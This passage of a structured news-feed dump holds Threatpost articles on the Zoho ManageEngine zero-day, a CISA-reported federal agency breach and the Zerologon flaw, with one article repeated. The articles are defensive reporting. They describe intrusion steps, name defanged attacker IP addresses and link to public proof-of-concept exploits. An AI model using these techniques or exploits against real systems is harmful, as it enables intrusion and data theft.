security researcher with Microsoft, pointed to[ at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-10T12:44:24", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost, attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a security researcher with Microsoft, pointed to[ at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/?utm_source=rss&utm_medium=rss&utm_campaign=critical-zoho-zero-day-flaw-disclosed", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:09:34", "description": "A federal agency has suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a>) on Thursday, not naming the agency but providing technical details of the attack. Hackers, it said, gained initial access by using employees\u2019 legitimate Microsoft Office 365 log-in credentials to sign onto an agency computer remotely.\n\n\u201cThe cyber-threat actor had valid access credentials for multiple users\u2019 Microsoft Office 365 (O365) accounts and domain administrator accounts,\u201d according to CISA. \u201cFirst, the threat actor logged into a user\u2019s O365 account from Internet Protocol (IP) address 91.219.236[.]166 and then browsed pages on a SharePoint site and downloaded a file. The cyber-threat actor connected multiple times by Transmission Control Protocol (TCP) from IP address 185.86.151[.]223 to the victim organization\u2019s virtual private network (VPN) server.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAs for how the attackers managed to get their hands on the credentials in the first place, CISA\u2019s investigation turned up no definitive answer \u2013 however, it speculated that it could have been a result of a vulnerability exploit that it said has been rampant across government networks.\n\n\u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability\u2014CVE-2019-11510\u2014in Pulse Secure,\u201d according to the alert. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\nThe patch was issued in April of 2019, but the Department of Homeland Security (DHS) in April of this year [noted that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) before the patches were deployed, bad actors were able to compromise Active Directory accounts via the flaw \u2013 so, even those who have patched for the bug could still be compromised and are vulnerable to attack.\n\nAfter initial access, the group set about carrying out reconnaissance on the network. First they logged into an agency O365 email account to view and download help-desk email attachments with \u201cIntranet access\u201d and \u201cVPN passwords\u201d in the subject lines \u2013 and it uncovered Active Directory and Group Policy key, changing a registry key for the Group Policy.\n\n\u201cImmediately afterward, the threat actor used common Microsoft Windows command line processes\u2014conhost, ipconfig, net, query, netstat, ping and whoami, plink.exe\u2014to enumerate the compromised system and network,\u201d according to CISA.\n\nThe next step was to connect to a virtual private server (VPS) through a Windows Server Message Block (SMB) client, using an alias secure identifier account that the group had previously created to log into it; then, they executed plink.exe, a remote administration utility.\n\nAfter that, they connected to command-and-control (C2), and installed a custom malware with the file name \u201cinetinfo.exe.\u201d The attackers also set up a locally mounted remote share, which \u201callowed the actor to freely move during its operations while leaving fewer artifacts for forensic analysis,\u201d CISA noted.\n\nThe cybercriminals, while logged in as an admin, created a scheduled task to run the malware, which turned out to be a dropper for additional payloads.\n\n\u201cinetinfo.exe is a unique, multi-stage malware used to drop files,\u201d explained CISA. \u201cIt dropped system.dll and 363691858 files and a second instance of inetinfo.exe. The system.dll from the second instance of inetinfo.exe decrypted 363691858 as binary from the first instance of inetinfo.exe. The decrypted 363691858 binary was injected into the second instance of inetinfo.exe to create and connect to a locally named tunnel. The injected binary then executed shellcode in memory that connected to IP address 185.142.236[.]198, which resulted in download and execution of a payload.\u201d\n\nIt added, \u201cThe cyber-threat actor was able to overcome the agency\u2019s anti-malware protection, and inetinfo.exe escaped quarantine.\u201d\n\nCISA didn\u2019t specify what the secondary payload was \u2013 Threatpost has reached out for additional information.\n\nThe threat group meanwhile also established a backdoor in the form of a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy.\n\n\u201cThe proxy allowed connections between an attacker-controlled remote server and one of the victim organization\u2019s file servers,\u201d according to CISA. \u201cThe reverse SOCKS proxy communicated through port 8100. This port is normally closed, but the attacker\u2019s malware opened it.\u201d\n\nA local account was then created, which was used for data collection and exfiltration. From the account, the cybercriminals browsed directories on victim file servers; copied files from users\u2019 home directories; connected an attacker-controlled VPS with the agency\u2019s file server (via a reverse SMB SOCKS proxy); and exfiltrated all the data using the Microsoft Windows Terminal Services client.\n\nThe attack has been remediated \u2013 and it\u2019s unclear when it took place. CISA said that it\u2019s intrusion-detection system was thankfully able to eventually flag the activity, however.\n\n\u201cCISA became aware\u2014via EINSTEIN, CISA\u2019s intrusion-detection system that monitors federal civilian networks\u2014of a potential compromise of a federal agency\u2019s network,\u201d according to the alert. \u201cIn coordination with the affected agency, CISA conducted an incident response engagement, confirming malicious activity.\u201d\n", "cvss3": {}, "published": "2020-09-24T20:47:40", "type": "threatpost", "title": "Feds Hit with Successful Cyberattack, Data Stolen", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2020-09-24T20:47:40", "id": "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "href": "https://threatpost.com/feds-cyberattack-data-stolen/159541/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-02T21:47:09", "description": "A spike in exploitation attempts against the Microsoft vulnerability CVE-2020-1472, known as the Zerologon bug, continues to plague businesses.\n\nThat\u2019s according to researchers from Cisco Talos, who warned that cybercriminals are redoubling their efforts to trigger the elevation-of-privilege bug in the Netlogon Remote Protocol, which was addressed in the August Microsoft Patch Tuesday report. Microsoft announced last week that it had started observing active exploitation in the wild: \u201cWe have observed attacks where public exploits have been incorporated into attacker playbooks,\u201d the firm [tweeted on Wednesday](<https://twitter.com/MsftSecIntel/status/1308941504707063808>).\n\nNow, the volume of those attacks is ramping up, according to Cisco Talos, and the stakes are high. Netlogon, available on Windows domain controllers, is used for various tasks related to user- and machine-authentication. A successful exploit allows an unauthenticated attacker with network access to a domain controller (DC) to completely compromise all Active Directory identity services, according to Microsoft.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis flaw allows attackers to impersonate any computer, including the domain controller itself and gain access to domain admin credentials,\u201d added Cisco Talos, [in a writeup](<https://blog.talosintelligence.com/2020/09/netlogon-rises.html#more>) on Monday. \u201cThe vulnerability stems from a flaw in a cryptographic authentication scheme used by the Netlogon Remote Protocol which \u2014 among other things \u2014 can be used to update computer passwords by forging an authentication token for specific Netlogon functionality.\u201d\n\nFour proof-of-concept (PoC) exploits [were recently released](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for the issue, which is a critical flaw rating 10 out of 10 on the CvSS severity scale. That prompted the U.S. [Cybersecurity and Infrastructure Security Agency](<https://cyber.dhs.gov/assets/report/ed-20-04.pdf>) (PDF) issued a dire warning that the \u201cvulnerability poses an unacceptable risk to the Federal Civilian Executive Branch and requires an immediate and emergency action.\u201d It also mandated that federal agencies patch their Windows Servers against Zerologon, in a rare emergency directive issued by the Secretary of Homeland Security.\n\n## **Two-Phased Patching**\n\nMicrosoft\u2019s patch process for Zerologon is a phased, two-part rollout.\n\nThe initial patch for the vulnerability was issued as part of the computing giant\u2019s [August 11 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>), which addresses the security issue in Active Directory domains and trusts, as well as Windows devices.\n\nHowever, to fully mitigate the security issue for third-party devices, users will need to not only update their domain controllers, but also enable \u201cenforcement mode.\u201d They should also monitor event logs to find out which devices are making vulnerable connections and address non-compliant devices, according to Microsoft.\n\n\u201cStarting February 2021, enforcement mode will be enabled on all Windows Domain Controllers and will block vulnerable connections from non-compliant devices,\u201d it said. \u201cAt that time, you will not be able to disable enforcement mode.\u201d\n\nLast week, both Samba and 0patch [issued fixes](<https://threatpost.com/zerologon-patches-beyond-microsoft/159513/>) for CVE-2020-1472, to fill in the some of the gaps that the official patch doesn\u2019t address, such as end-of-life versions of Windows, in the case of the latter.\n\nSamba, a third-party file-sharing utility for swapping materials between Linux and Windows systems, relies on the Netlogon protocol, and thus suffers from the vulnerability. The bug exists when Samba is used as domain controller only (most seriously the Active Directory DC, but also the classic/NT4-style DC),\n", "cvss3": {}, "published": "2020-09-29T18:13:47", "type": "threatpost", "title": "Zerologon Attacks Against Microsoft DCs Snowball in a Week", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-29T18:13:47", "id": "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "href": "https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:53:29", "description": "Microsoft is taking matters into its own hands when it comes to companies that haven\u2019t yet updated their systems to address the critical Zerologon flaw. The tech giant will soon by default block vulnerable connections on devices that could be used to exploit the flaw.\n\nStarting Feb. 9, Microsoft said it will enable domain controller \u201cenforcement mode\u201d by default, a measure that would help mitigate the threat.\n\nMicrosoft Active Directory domain controllers are at the heart of the Zerologon vulnerability. Domain controllers respond to authentication requests and verify users on computer networks. [A successful exploit of the flaw](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) allows unauthenticated attackers with network access to domain controllers to completely compromise all Active Directory identity services.\n\n[](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit>)\n\nClick to Register \u2013 New Browser Tab Opens\n\nDomain Controller enforcement mode \u201cwill block vulnerable connections from non-compliant devices,\u201d said Aanchal Gupta, VP of engineering with Microsoft [in a Thursday post](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>). \u201cDC enforcement mode requires that all Windows and non-Windows devices use secure RPC with Netlogon secure channel unless customers have explicitly allowed the account to be vulnerable by adding an exception for the non-compliant device.\u201d\n\nSecure RPC is an authentication method that authenticates both the host and the user who is making a request for a service.\n\nThis new implementation is an attempt to block cybercriminals from gaining network access to domain controllers, which they can utilize to exploit the Zerologon privilege-escalation glitch ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)). The flaw, with a critical-severity CVSS score of 10 out of 10, was first addressed in [Microsoft\u2019s August 2020 security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). But [starting in September](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), at least four public Proof-of-Concept (PoC) exploits for the flaw were released on** **[Github,](<https://github.com/dirkjanm/CVE-2020-1472>) along with technical details of the vulnerability.\n\nThe enforcement mode \u201cis a welcome move because it is such a potentially damaging vulnerability that could be used to hijack full Domain Admin privileges \u2013 the \u2018Crown Jewels\u2019 of any network providing an attacker with God-mode for the Windows server network,\u201d Mark Kedgley, CTO at New Net Technologies (NNT), told Threatpost. \u201cBy defaulting this setting it is clear that it is seen as too dangerous to leave open. [The] message to everyone is to patch often and regularly and ensure your secure configuration build standard is up to date with the latest [Center for Internet Security] or [Security Technical Implementation Guide] recommendations.\u201d\n\nZerologon has grown more serious over the past few months as several threat actors and advanced persistent threat (APT) groups closed in on the flaw, including cybercriminals like the [China-backed APT Cicada](<https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/>) and [the MERCURY APT group](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>).\n\n\u201cReported attacks began occurring within just two weeks of the vulnerability being disclosed,\u201d Ivan Righi, cyber threat intelligence analyst at Digital Shadows, told Threatpost. \u201cAPT10 (aka Cicada, Stone Panda, and Cloud Hoppe) was also observed leveraging Zerologon to target Japanese companies in November 2020.\u201d\n\nThe U.S. government has also stepped in to rally organizations to update after the publication of the exploits, with the DHS issuing [a rare emergency directive](<https://cyber.dhs.gov/assets/report/ed-20-04.pdf>) that ordered federal agencies to patch their Windows Servers against the flaw by Sept. 21.\n\nGupta for his part said that organizations can take four steps to avoid the serious flaw: Updating their domain controllers to an update released Aug. 11, 2020, or later; find which devices are making vulnerable connections (via monitoring log events); addressing those non-compliant devices making the vulnerable connections; and enabling domain controller enforcement.\n\n\u201cConsidering the severity of the vulnerability, it is advised that all Domain Controllers be updated with the latest security patch as soon as possible,\u201d Righi told Threatpost.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a _[_limited-engagement and LIVE Threatpost webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_. CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: _[**_Register Now_**](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ and reserve a spot for this exclusive Threatpost _[_Supply-Chain Security webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ \u2013 Jan. 20, 2 p.m._\n", "cvss3": {}, "published": "2021-01-15T21:47:20", "type": "threatpost", "title": "Microsoft Implements Windows Zerologon Flaw 'Enforcement Mode'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-15T21:47:20", "id": "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "href": "https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-30T22:48:56", "description": "Threat attackers continue to exploit the Microsoft Zerologon vulnerability, a situation that\u2019s been a persistent worry to both the company and the U.S. government over the last few months. Both on Thursday renewed their pleas to businesses and end users to update Windows systems with a patch Microsoft released in August to mitigate attacks.\n\nDespite patching awareness efforts, Microsoft said it is still receiving \u201ca small number of reports from customers and others\u201d about active exploits of the bug tracked as [CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>), or Zerologon, according to a [blog post](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>) by Aanchal Gupta, vice president of engineering for MSRC, on Thursday.\n\nThe zero-day elevation-of-privilege vulnerability\u2014rated as critical and first disclosed and [patched on Aug. 11](<https://threatpost.com/0-days-active-attack-bugs-patched-microsoft/158280/>)\u2013could allow an attacker to spoof a domain controller account and then use it to steal domain credentials, take over the domain and completely compromise all Active Directory identity services. \n[](<https://threatpost.com/newsletter-sign/>) \nThe bug is located in a core authentication component of Active Directory within the Windows Server OS and the Microsoft Windows Netlogon Remote Protocol (MS-NRPC). The flaw stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user and machine authentication.\n\nGupta urged organizations to deploy the Aug.11 patch or later release to every domain controller as the first in a four-step process to fix the vulnerability. Then administrators should monitor event logs to find which devices are making vulnerable connections; address identified non-compliant devices; and enable enforcement to address the bug in the overall environment, he said.\n\n\u201cOnce fully deployed, Active Directory domain controller and trust accounts will be protected alongside Windows domain-joined machine accounts,\u201d he said.\n\nIn addition to Microsoft\u2019s patches, last month both Samba and 0patch also [issued fixes](<https://threatpost.com/zerologon-patches-beyond-microsoft/159513/>) for CVE-2020-1472 to fill in the some of the gaps that the official patch doesn\u2019t address, such as end-of-life versions of Windows.\n\nMicrosoft\u2019s latest advisory was enough for the Department of Homeland Security\u2019s (DHS\u2019s) Cybersecurity and Infrastructure Security Agency (CISA) to step in and issue a [statement](<https://us-cert.cisa.gov/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472>) of its own Thursday warning organizations about continued exploit of the bug.\n\nGiven the severity of the vulnerability, the government has been nearly as active as Microsoft in urging people to update their systems. Interest from the feds likely has intensified since Microsoft\u2019s [warning earlier this month](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) that an Iranian nation-state advanced persistent threat (APT) actor that Microsoft calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm) is now actively exploiting Zerologon.\n\n\u201cCISA urges administrators to patch all domain controllers immediately\u2014until every domain controller is updated, the entire infrastructure remains vulnerable, as threat actors can identify and exploit a vulnerable system in minutes,\u201d according to the CISA alert.\n\nThe agency even has released a [patch validation script](<https://github.com/cisagov/cyber.dhs.gov/tree/master/assets/report/ed-20-04_script>) to detect unpatched Microsoft domain controllers to help administers install the update. \u201cIf there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse detected, it should be assumed that malicious cyber actors have compromised all identity services,\u201d the CISA warned.\n\nZerologon has been a consistent thorn in Microsoft\u2019s side since its discovery, a scenario that has escalated since early September thanks largely to the publication of [four proof-of-concept exploits](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for the flaw on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) Soon after the exploits were published, Cisco Talos researchers [warned of a spike](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) in exploitation attempts against Zerologon.\n\nThe U.S. government first stepped in to rally organizations to update after the publication of the exploits, with the DHS issuing [a rare emergency directive](<https://cyber.dhs.gov/assets/report/ed-20-04.pdf>) that ordered federal agencies to patch their Windows Servers against the flaw by Sept. 21.\n\n#### **Hackers Put Bullseye on Healthcare: ****[On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-30T11:41:36", "type": "threatpost", "title": "Microsoft Warns Threat Actors Continue to Exploit Zerologon Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-30T11:41:36", "id": "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "href": "https://threatpost.com/microsoft-warns-zerologon-bug/160769/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-21T19:45:56", "description": "Federal agencies that haven\u2019t patched their Windows Servers against the \u2018Zerologon\u2019 vulnerability by Monday Sept. 21 at 11:59 pm EDT are in violation of a rare emergency directive issued by the Secretary of Homeland Security.\n\nWith only hours until the deadline for the directive, [issued on Friday](<https://cyber.dhs.gov/ed/20-04/>), to be executed, what is at stake is a \u201cvulnerability [that] poses an unacceptable risk to the Federal Civilian Executive Branch and requires an immediate and emergency action,\u201d according to the [Cybersecurity and Infrastructure Security Agency](<https://cyber.dhs.gov/assets/report/ed-20-04.pdf>) (PDF).\n\nMicrosoft released a patch for the vulnerability ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)) as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). However, [earlier this month the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe bug is located in a core authentication component of Active Directory within the Windows Server OS and the Microsoft Windows Netlogon Remote Protocol (MS-NRPC). Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\n\u201cThis attack has a huge impact: It basically allows any attacker on the local network (such as a malicious insider or someone who simply plugged in a device to an on-premise network port) to completely compromise the Windows domain,\u201d said researchers with Secura, [in a whitepaper](<https://www.secura.com/pathtoimg.php?id=2055>) published earlier this month.\n\n[As previous reported](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), the flaw stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user and machine authentication.\n\n\u201cThe issue exists in the usage of AES-CFB8 encryption 